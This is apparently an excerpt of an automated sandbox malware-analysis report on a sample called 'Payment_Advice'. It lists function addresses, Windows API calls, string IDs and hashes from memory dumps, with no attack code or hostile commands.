                                                                                                    • Instruction ID: 5095b703a1bb8c0b1a171f284fcd93457a1f76f51a61ad65b57324fa5271cbfb
                                                                                                    • Opcode Fuzzy Hash: 94d23d8662282435525989383b7baa24a6bf167c78f2130f2a7005a25aeaabfd
                                                                                                    • Instruction Fuzzy Hash: F5A011E22A80223C300822002C0BCBB0F0CE8C0B20330882EFC20A0080AC8028820833
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E3FC
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: fdcd8ac3be2ae8294ab411d6476ff3841c95abeb5bd800781bec711f4b009e56
                                                                                                    • Instruction ID: 260deee851b4d6e343054b1fe453c9ce86cb2e92089be700059c4ebdc8251605
                                                                                                    • Opcode Fuzzy Hash: fdcd8ac3be2ae8294ab411d6476ff3841c95abeb5bd800781bec711f4b009e56
                                                                                                    • Instruction Fuzzy Hash: 87A011E22AC022BC300822002C0BCBB0F0CE8C0B203308C2EFC22A0080A88028820833
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E3FC
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 64e452ab1a1c98a1d473d88da5d01ac4fad107965b8f3e0cc177e336e918e2ae
                                                                                                    • Instruction ID: 260deee851b4d6e343054b1fe453c9ce86cb2e92089be700059c4ebdc8251605
                                                                                                    • Opcode Fuzzy Hash: 64e452ab1a1c98a1d473d88da5d01ac4fad107965b8f3e0cc177e336e918e2ae
                                                                                                    • Instruction Fuzzy Hash: 87A011E22AC022BC300822002C0BCBB0F0CE8C0B203308C2EFC22A0080A88028820833
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E3FC
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 31a737a6d51ce8471b4ef6ccac37103ed15197c9f08e10e6cc1ba492a49bddfb
                                                                                                    • Instruction ID: 260deee851b4d6e343054b1fe453c9ce86cb2e92089be700059c4ebdc8251605
                                                                                                    • Opcode Fuzzy Hash: 31a737a6d51ce8471b4ef6ccac37103ed15197c9f08e10e6cc1ba492a49bddfb
                                                                                                    • Instruction Fuzzy Hash: 87A011E22AC022BC300822002C0BCBB0F0CE8C0B203308C2EFC22A0080A88028820833
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E3FC
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 6873e6c31a88d634a1515b9b1e2f65d837a4b2ee1be56e38575fffa262c632c8
                                                                                                    • Instruction ID: 260deee851b4d6e343054b1fe453c9ce86cb2e92089be700059c4ebdc8251605
                                                                                                    • Opcode Fuzzy Hash: 6873e6c31a88d634a1515b9b1e2f65d837a4b2ee1be56e38575fffa262c632c8
                                                                                                    • Instruction Fuzzy Hash: 87A011E22AC022BC300822002C0BCBB0F0CE8C0B203308C2EFC22A0080A88028820833
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E3FC
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 3cd46db6d8f79c7373af5b0258d8ff1b7f8eea29a59b7da0641bc8db4e4b6b73
                                                                                                    • Instruction ID: 260deee851b4d6e343054b1fe453c9ce86cb2e92089be700059c4ebdc8251605
                                                                                                    • Opcode Fuzzy Hash: 3cd46db6d8f79c7373af5b0258d8ff1b7f8eea29a59b7da0641bc8db4e4b6b73
                                                                                                    • Instruction Fuzzy Hash: 87A011E22AC022BC300822002C0BCBB0F0CE8C0B203308C2EFC22A0080A88028820833
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00509F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetEndOfFile.KERNELBASE(?,0050903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00509F0C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File
                                                                                                    • String ID:
                                                                                                    • API String ID: 749574446-0
                                                                                                    • Opcode ID: f8bf571d3023a0292f49a4467b3138c50cb86ef7b45a3818125e33c92980aaf8
                                                                                                    • Instruction ID: 16004a85731d96b908246ed468ff7ea234b09c3dffe07045bf57e3871fce025b
                                                                                                    • Opcode Fuzzy Hash: f8bf571d3023a0292f49a4467b3138c50cb86ef7b45a3818125e33c92980aaf8
                                                                                                    • Instruction Fuzzy Hash: D6A0113008800A8AEE002B30CA0800C3B20EB20BC030002A8A00ACA0A2CB2A880BAA00
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,0051AE72,C:\Users\user\Desktop,00000000,0054946A,00000006), ref: 0051AC08
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentDirectory
                                                                                                    • String ID:
                                                                                                    • API String ID: 1611563598-0
                                                                                                    • Opcode ID: ae9b26be83c7e9103d52a3076ac40d24b111367f10cf74cd204ad1571fcd508e
                                                                                                    • Instruction ID: b1ead3f50dc62a44af208e8c754f20da1531cca12418ce7a0e41f345ea7f03b6
                                                                                                    • Opcode Fuzzy Hash: ae9b26be83c7e9103d52a3076ac40d24b111367f10cf74cd204ad1571fcd508e
                                                                                                    • Instruction Fuzzy Hash: F0A011302002008B83000B328F0AA0EBAAAAFA2B20F00C028A00080230CB30C820FA00
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Non-executed Functions

                                                                                                    Function 0051C220 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 286timewindowfileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00501316: GetDlgItem.USER32(00000000,00003021), ref: 0050135A
                                                                                                      • Part of subcall function 00501316: SetWindowTextW.USER32(00000000,005335F4), ref: 00501370
                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0051C2B1
                                                                                                    • EndDialog.USER32(?,00000006), ref: 0051C2C4
                                                                                                    • GetDlgItem.USER32(?,0000006C), ref: 0051C2E0
                                                                                                    • SetFocus.USER32(00000000), ref: 0051C2E7
                                                                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 0051C321
                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0051C358
                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0051C36E
                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0051C38C
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0051C39C
                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0051C3B8
                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0051C3D4
                                                                                                    • _swprintf.LIBCMT ref: 0051C404
                                                                                                      • Part of subcall function 00504092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 005040A5
                                                                                                    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0051C417
                                                                                                    • FindClose.KERNEL32(00000000), ref: 0051C41E
                                                                                                    • _swprintf.LIBCMT ref: 0051C477
                                                                                                    • SetDlgItemTextW.USER32(?,00000068,?), ref: 0051C48A
                                                                                                    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0051C4A7
                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0051C4C7
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0051C4D7
                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0051C4F1
                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0051C509
                                                                                                    • _swprintf.LIBCMT ref: 0051C535
                                                                                                    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0051C548
                                                                                                    • _swprintf.LIBCMT ref: 0051C59C
                                                                                                    • SetDlgItemTextW.USER32(?,00000069,?), ref: 0051C5AF
                                                                                                      • Part of subcall function 0051AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0051AF35
                                                                                                      • Part of subcall function 0051AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0053E72C,?,?), ref: 0051AF84
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                    • String ID: %s %s$%s %s %s$PQ$REPLACEFILEDLG
                                                                                                    • API String ID: 797121971-1312056977
                                                                                                    • Opcode ID: 17fd49fb86dc462ec62771c89bab1ff21bb3fda609eec7bace2adec74c7d5aba
                                                                                                    • Instruction ID: b0ed41e24b8eb3a7f105edeb79b92dbe0e04eda61e0f56e096610c8431df6a02
                                                                                                    • Opcode Fuzzy Hash: 17fd49fb86dc462ec62771c89bab1ff21bb3fda609eec7bace2adec74c7d5aba
                                                                                                    • Instruction Fuzzy Hash: CC91A7721483447BE3219BA4DC4DFFB7FACFB9A700F044819F685D6181D771A6489762
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00506FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00506FAA
                                                                                                    • _wcslen.LIBCMT ref: 00507013
                                                                                                    • _wcslen.LIBCMT ref: 00507084
                                                                                                      • Part of subcall function 00507A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00507AAB
                                                                                                      • Part of subcall function 00507A9C: GetLastError.KERNEL32 ref: 00507AF1
                                                                                                      • Part of subcall function 00507A9C: CloseHandle.KERNEL32(?), ref: 00507B00
                                                                                                      • Part of subcall function 0050A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0050977F,?,?,005095CF,?,?,?,?,?,00532641,000000FF), ref: 0050A1F1
                                                                                                      • Part of subcall function 0050A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0050977F,?,?,005095CF,?,?,?,?,?,00532641), ref: 0050A21F
                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00507139
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00507155
                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00507298
                                                                                                      • Part of subcall function 00509DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,005073BC,?,?,?,00000000), ref: 00509DBC
                                                                                                      • Part of subcall function 00509DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00509E70
                                                                                                      • Part of subcall function 00509620: FindCloseChangeNotification.KERNELBASE(000000FF,?,?,005095D6,?,?,?,?,?,00532641,000000FF), ref: 0050963B
                                                                                                      • Part of subcall function 0050A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0050A325,?,?,?,0050A175,?,00000001,00000000,?,?), ref: 0050A501
                                                                                                      • Part of subcall function 0050A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0050A325,?,?,?,0050A175,?,00000001,00000000,?,?), ref: 0050A532
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushH_prologLastNotificationProcessTime
                                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                    • API String ID: 2821348736-3508440684
                                                                                                    • Opcode ID: 5ad01bc77fae769b9dfc2d2ef8efc13cbf62b7a1de7f56448c3f49d7f2f8495a
                                                                                                    • Instruction ID: 91ea4c628734bf219d526212f185fd196a40b17fcc038e7e8de8b83770329192
                                                                                                    • Opcode Fuzzy Hash: 5ad01bc77fae769b9dfc2d2ef8efc13cbf62b7a1de7f56448c3f49d7f2f8495a
                                                                                                    • Instruction Fuzzy Hash: F6C10971D0460AAAEB24DB74DC49FEEBBA8BF48300F004559F956E72C2D734BA44CB61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052D8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __floor_pentium4
                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                    • API String ID: 4168288129-2761157908
                                                                                                    • Opcode ID: 8e4bdd45eae26688076450b316942d2543b938c228561d450616170c3d0e39ef
                                                                                                    • Instruction ID: 259cd288bd7b6cca43ce63fa16ab051cf17a4cc8e64c65af3dfdb6cd2d8b253a
                                                                                                    • Opcode Fuzzy Hash: 8e4bdd45eae26688076450b316942d2543b938c228561d450616170c3d0e39ef
                                                                                                    • Instruction Fuzzy Hash: 62C24971E046288FDB25CE28AD457EABBB5FF86304F1445EAD44DE7280E774AE818F40
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005032F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog_swprintf
                                                                                                    • String ID: CMT$h%u$hc%u
                                                                                                    • API String ID: 146138363-3282847064
                                                                                                    • Opcode ID: 35878f14cceb273a08eba65709c20949a8862d7e6dc201c866e8571cbc8387a9
                                                                                                    • Instruction ID: cd7aa3a2fcc546274791cfc02a3ac27b6eb38997f2c47eb195268888d532abef
                                                                                                    • Opcode Fuzzy Hash: 35878f14cceb273a08eba65709c20949a8862d7e6dc201c866e8571cbc8387a9
                                                                                                    • Instruction Fuzzy Hash: C832B2715107859BEB14DF74C89AAED3FA9BF55300F084579FD8A8B2C2DB709A49CB20
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0050286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00502874
                                                                                                    • _strlen.LIBCMT ref: 00502E3F
                                                                                                      • Part of subcall function 005102BA: __EH_prolog.LIBCMT ref: 005102BF
                                                                                                      • Part of subcall function 00511B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0050BAE9,00000000,?,?,?,00010440), ref: 00511BA0
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00502F91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
